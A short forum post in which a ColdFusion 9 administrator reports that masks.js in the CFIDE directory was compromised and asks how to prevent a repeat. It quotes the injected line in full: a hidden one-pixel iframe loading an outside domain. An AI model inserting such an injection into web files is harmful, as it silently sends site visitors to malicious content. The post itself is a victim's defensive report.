8 Replies Latest reply on Sep 5, 2013 2:10 AM by tribule

    CFIDE/scripts/masks.js Compromised


      We just found an injection at the end of masks.js


      Here is the content that was added:

      "document.write("<iframe width='1' height='0' src='http://top12.oufm.info/'></iframe>");"


      Not sure what to make out of it. We have a very cryptic password known only to 2 people. Hacking the server would be pretty difficult so I assume somehow hacking into CFIDE was the issue. Anybody seen anything similar?


      It must have happened August 31, 2013

      We are using CF 9.02 with ....lib/updates/hf902-00003.jar


      Thanks for any feedback and advice how to prevent another one